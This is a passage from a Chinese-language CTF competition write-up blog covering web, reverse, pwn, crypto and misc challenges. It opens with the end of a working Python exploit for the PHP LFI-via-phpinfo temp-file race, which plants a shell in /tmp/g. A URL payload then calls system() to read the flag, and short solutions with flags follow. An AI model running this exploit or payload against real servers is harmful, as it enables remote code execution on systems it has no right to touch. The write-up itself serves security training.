fn</span><br><span class="line"></span><br><span class="line">counter=<span class="number">0</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ThreadWorker</span><span class="params">(threading.Thread)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, e, l, m, *args)</span>:</span></span><br><span class="line">        threading.Thread.__init__(self)</span><br><span class="line">        self.event = e</span><br><span class="line">        self.lock =  l</span><br><span class="line">        self.maxattempts = m</span><br><span class="line">        self.args = args</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(self)</span>:</span></span><br><span class="line">        <span class="keyword">global</span> counter</span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">not</span> self.event.is_set():</span><br><span class="line">            <span class="keyword">with</span> self.lock:</span><br><span class="line">                <span class="keyword">if</span> counter &gt;= self.maxattempts:</span><br><span class="line">                    <span class="keyword">return</span></span><br><span class="line">                counter+=<span class="number">1</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                x = phpInfoLFI(*self.args)</span><br><span class="line">                <span class="keyword">if</span> self.event.is_set():</span><br><span class="line">                    <span class="keyword">break</span>                </span><br><span class="line">                <span class="keyword">if</span> x:</span><br><span class="line">                    <span class="keyword">print</span> <span class="string">"\nGot it! Shell created in /tmp/g"</span></span><br><span class="line">                    self.event.set()</span><br><span class="line">                    </span><br><span class="line">            <span class="keyword">except</span> socket.error:</span><br><span class="line">                <span class="keyword">return</span></span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getOffset</span><span class="params">(host, port, phpinforeq)</span>:</span></span><br><span class="line">    <span class="string">"""Gets offset of tmp_name in the php output"""</span></span><br><span class="line">    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    s.connect((host,port))</span><br><span class="line">    s.send(phpinforeq)</span><br><span class="line">    </span><br><span class="line">    d = <span class="string">""</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        i = s.recv(<span class="number">4096</span>)</span><br><span class="line">        d+=i        </span><br><span class="line">        <span class="keyword">if</span> i == <span class="string">""</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="comment"># detect the final chunk</span></span><br><span class="line">        <span class="keyword">if</span> i.endswith(<span class="string">"0\r\n\r\n"</span>):</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    s.close()</span><br><span class="line">    i = d.find(<span class="string">"[tmp_name] =&amp;gt; "</span>)</span><br><span class="line">    <span class="keyword">if</span> i == <span class="number">-1</span>:</span><br><span class="line">        <span class="keyword">raise</span> ValueError(<span class="string">"No php tmp_name in phpinfo output"</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">print</span> <span class="string">"found %s at %i"</span> % (d[i:i+<span class="number">10</span>],i)</span><br><span class="line">    <span class="comment"># padded up a bit</span></span><br><span class="line">    <span class="keyword">return</span> i+<span class="number">256</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">print</span> <span class="string">"LFI With PHPInfo()"</span></span><br><span class="line">    <span class="keyword">print</span> <span class="string">"-="</span> * <span class="number">30</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) &lt; <span class="number">2</span>:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"Usage: %s host [port] [threads]"</span> % sys.argv[<span class="number">0</span>]</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        host = socket.gethostbyname(sys.argv[<span class="number">1</span>])</span><br><span class="line">    <span class="keyword">except</span> socket.error, e:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"Error with hostname %s: %s"</span> % (sys.argv[<span class="number">1</span>], e)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    port=<span class="number">80</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        port = int(sys.argv[<span class="number">2</span>])</span><br><span class="line">    <span class="keyword">except</span> IndexError:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    <span class="keyword">except</span> ValueError, e:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"Error with port %d: %s"</span> % (sys.argv[<span class="number">2</span>], e)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line">    </span><br><span class="line">    poolsz=<span class="number">10</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        poolsz = int(sys.argv[<span class="number">3</span>])</span><br><span class="line">    <span class="keyword">except</span> IndexError:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    <span class="keyword">except</span> ValueError, e:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"Error with poolsz %d: %s"</span> % (sys.argv[<span class="number">3</span>], e)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">print</span> <span class="string">"Getting initial offset..."</span>,  </span><br><span class="line">    reqphp, tag, reqlfi = setup(host, port)</span><br><span class="line">    offset = getOffset(host, port, reqphp)</span><br><span class="line">    sys.stdout.flush()</span><br><span class="line"></span><br><span class="line">    maxattempts = <span class="number">1000</span></span><br><span class="line">    e = threading.Event()</span><br><span class="line">    l = threading.Lock()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">print</span> <span class="string">"Spawning worker pool (%d)..."</span> % poolsz</span><br><span class="line">    sys.stdout.flush()</span><br><span class="line"></span><br><span class="line">    tp = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,poolsz):</span><br><span class="line">        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> t <span class="keyword">in</span> tp:</span><br><span class="line">        t.start()</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">not</span> e.wait(<span class="number">1</span>):</span><br><span class="line">            <span class="keyword">if</span> e.is_set():</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">with</span> l:</span><br><span class="line">                sys.stdout.write( <span class="string">"\r% 4d / % 4d"</span> % (counter, maxattempts))</span><br><span class="line">                sys.stdout.flush()</span><br><span class="line">                <span class="keyword">if</span> counter &gt;= maxattempts:</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">print</span></span><br><span class="line">        <span class="keyword">if</span> e.is_set():</span><br><span class="line">            <span class="keyword">print</span> <span class="string">"Woot!  \m/"</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">print</span> <span class="string">":("</span></span><br><span class="line">    <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"\nTelling threads to shutdown..."</span></span><br><span class="line">        e.set()</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">print</span> <span class="string">"Shuttin' down..."</span></span><br><span class="line">    <span class="keyword">for</span> t <span class="keyword">in</span> tp:</span><br><span class="line">        t.join()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;202.119.201.197:13077&#x2F;?file&#x3D;&#x2F;tmp&#x2F;g&amp;1&#x3D;system(%27cat%20&#x2F;tmp&#x2F;7IDUrqGOt8PMATm852&#x2F;flag.txt%27);</span><br><span class="line">#CUMTCTF&#123;Orz_to_php1nf0&#125;</span><br></pre></td></tr></table></figure>
<p>最后直接命令执行，但好像找了好久才看见flag</p>
<h1 id="re"><a href="#re" class="headerlink" title="re"></a>re</h1><h2 id="连个签到的分都不给你"><a href="#连个签到的分都不给你" class="headerlink" title="连个签到的分都不给你"></a>连个签到的分都不给你</h2><p>直接010查看搜cumtctf可以看见flag</p>
<h2 id="python题禁止py"><a href="#python题禁止py" class="headerlink" title="python题禁止py"></a>python题禁止py</h2><p>直接上脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># flag = input()</span></span><br><span class="line">cipher = [<span class="number">80</span>,<span class="number">70</span>,<span class="number">94</span>,<span class="number">71</span>,<span class="number">80</span>,<span class="number">71</span>,<span class="number">85</span>,<span class="number">104</span>,<span class="number">86</span>,<span class="number">39</span>,<span class="number">64</span>,<span class="number">106</span>,<span class="number">76</span>,<span class="number">67</span>,<span class="number">106</span>,<span class="number">71</span>,<span class="number">123</span>,<span class="number">92</span>,<span class="number">125</span>,<span class="number">76</span>,<span class="number">37</span>,<span class="number">106</span>,<span class="number">103</span>,<span class="number">118</span>,<span class="number">80</span>,<span class="number">35</span>,<span class="number">119</span>,<span class="number">32</span>,<span class="number">110</span>]</span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># if(len(flag==29)):</span></span><br><span class="line"><span class="comment">#     for i,n in enumerate(flag):</span></span><br><span class="line"><span class="comment">#         if ord(n) ^ 19 != cipher[i]:</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># else:</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> cipher:</span><br><span class="line">    a = i ^ <span class="number">19</span></span><br><span class="line">    print(chr(a),end=<span class="string">''</span>)</span><br></pre></td></tr></table></figure>
<h2 id="兄弟们快来帮帮萄萄"><a href="#兄弟们快来帮帮萄萄" class="headerlink" title="兄弟们快来帮帮萄萄"></a>兄弟们快来帮帮萄萄</h2><p>脱壳拖入IDA可以看见flag</p>
<h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="test-nc"><a href="#test-nc" class="headerlink" title="test_nc"></a>test_nc</h2><p>nc 监听领flag</p>
<h2 id="babystack"><a href="#babystack" class="headerlink" title="babystack"></a>babystack</h2><p>脱入010并输入字符串看是直接可以bash</p>
<p>直接读取就可以拿flag</p>
<h1 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h1><h2 id="幼儿园的密码题"><a href="#幼儿园的密码题" class="headerlink" title="幼儿园的密码题"></a>幼儿园的密码题</h2><p>rsa，已知e n c 求m</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># e = 0x10001</span></span><br><span class="line"><span class="comment"># n = 0xeb80cc09ed9780fe25cadf7c168d2da3ea24e35237e92faf5ee0d7980c11302f</span></span><br><span class="line"><span class="comment"># c = 0x596d5175112e346590aae5a3d633e71d2d12b28b60f08f8efa82fc092acc8c2d</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Hint ： google RS</span></span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line">e=<span class="number">0x10001</span></span><br><span class="line">c = <span class="number">0x596d5175112e346590aae5a3d633e71d2d12b28b60f08f8efa82fc092acc8c2d</span></span><br><span class="line">p = <span class="number">324350545929838254331191385863847627003</span></span><br><span class="line">q = <span class="number">328413456989577256301798468872388310877</span></span><br><span class="line">n = <span class="number">0xeb80cc09ed9780fe25cadf7c168d2da3ea24e35237e92faf5ee0d7980c11302f</span></span><br><span class="line">d = gmpy2.invert(e,(p<span class="number">-1</span>)*(q<span class="number">-1</span>))</span><br><span class="line">m = pow(c,d,n)</span><br><span class="line">print(long_to_bytes(m))</span><br></pre></td></tr></table></figure>
<p>可以看见flag</p>
<h2 id="小学生的密码题"><a href="#小学生的密码题" class="headerlink" title="小学生的密码题"></a>小学生的密码题</h2><p>这个很明显就可以看出规律就是一般都是以8开头</p>
<p>然后我有点懒（说实话是不太会写）就一个一个拼接出flag</p>
<h1 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h1><h2 id="真·签到题"><a href="#真·签到题" class="headerlink" title="真·签到题"></a>真·签到题</h2><p>zip伪加密然后base64解密拿flag</p>
<h2 id="别做题了听歌吧"><a href="#别做题了听歌吧" class="headerlink" title="别做题了听歌吧"></a>别做题了听歌吧</h2><p>mp3隐写</p>
<p>这个题可以  cumt是密码</p>
<p>然后是mose编码我真是一个一个拼的，应该拿python脚本写比较好，毕竟pytho学得不太好</p>
<p>应该是这个，拼错了好几回</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CUMTCTF&#123;M0RS38MORSE8M0RS38MORSE8M0RSE8AND8MP3ST39O&#125;</span><br></pre></td></tr></table></figure>
<h2 id="大鲨鱼之你可劲找"><a href="#大鲨鱼之你可劲找" class="headerlink" title="大鲨鱼之你可劲找"></a>大鲨鱼之你可劲找</h2><p>流量包分析，直接跟tcp流可以看见一个盲注的传输内容</p>
<p>是二分法</p>
<p>然后我就又又又自己拼写</p>
<p>拼错了好几回</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CUMTCTF&#123;cecc1394-6133-43d0-be06-a41c5f231dd4&#125;</span><br></pre></td></tr></table></figure>

    
  </div>

</article>


   

   
  <div class="box-prev-next clearfix">
    <a class="show pull-left" href="/2020/08/13/python%E5%BC%80%E5%8F%91/">
        <i class="icon icon-angle-left"></i>
    </a>
    <a class="show pull-right" href="/2020/09/27/BUU%E5%88%B7%E9%A2%98/">
        <i class="icon icon-angle-right"></i>
    </a>
  </div>




</div>


  <a id="backTop" class="back-top">
    <i class="icon-angle-up"></i>
  </a>




  <div class="modal" id="modal">
  <span id="cover" class="cover hide"></span>
  <div id="modal-dialog" class="modal-dialog hide-dialog">
    <div class="modal-header">
      <span id="close" class="btn-close">Close</span>
    </div>
    <hr>
    <div class="modal-body">
      <ul class="list-toolbox">
        
          <li class="item-toolbox">
            <a
              class="ROUND_RECT"
              href="/archives/"
              rel="noopener noreferrer"
              target="_self"
              >
              Blog
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="ROUND_RECT"
              href="/tag/"
              rel="noopener noreferrer"
              target="_self"
              >
              Tag
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="ROUND_RECT"
              href="/about/"
              rel="noopener noreferrer"
              target="_self"
              >
              About
            </a>
          </li>
        
      </ul>

    </div>
  </div>
</div>



  
      <div class="fexo-comments comments-post">
    

    

    
    

    

    
    

    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script>
    <div id="comment" class="vcomment" ></div>
    <script>
        var notify = 'true' == true ? true : false;
        var verify = 'true' == true ? true : false;
        var GUEST_INFO = ['nick','mail','link'];
        var guest_info = 'nick,mail,link'.split(',').filter(function(item){
            return GUEST_INFO.indexOf(item) > -1
        });
        guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
        window.valine = new Valine({
            el: '.vcomment',
            notify: notify,
            verify: verify,
            appId: "KLWvKGPeSIyoEo4k6j3v37wy-gzGzoHsz",
            appKey: "FL93w3BBbF9lxiR8X1HI58En",
            avatar:'wavatar',
            placeholder: "Just go go",
            guest_info:guest_info,
            pageSize:'6'
        });
    </script>
  
    

  </div>

  

  <script type="text/javascript">
  function loadScript(url, callback) {
    var script = document.createElement('script')
    script.type = 'text/javascript';

    if (script.readyState) { //IE
      script.onreadystatechange = function() {
        if (script.readyState == 'loaded' ||
          script.readyState == 'complete') {
          script.onreadystatechange = null;
          callback();
        }
      };
    } else { //Others
      script.onload = function() {
        callback();
      };
    }

    script.src = url;
    document.getElementsByTagName('head')[0].appendChild(script);
  }

  window.onload = function() {
    loadScript('/js/bundle.js?235683', function() {
      // load success
    });
  }
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<!-- <script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>-->
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML"></script>
</body>
</html>
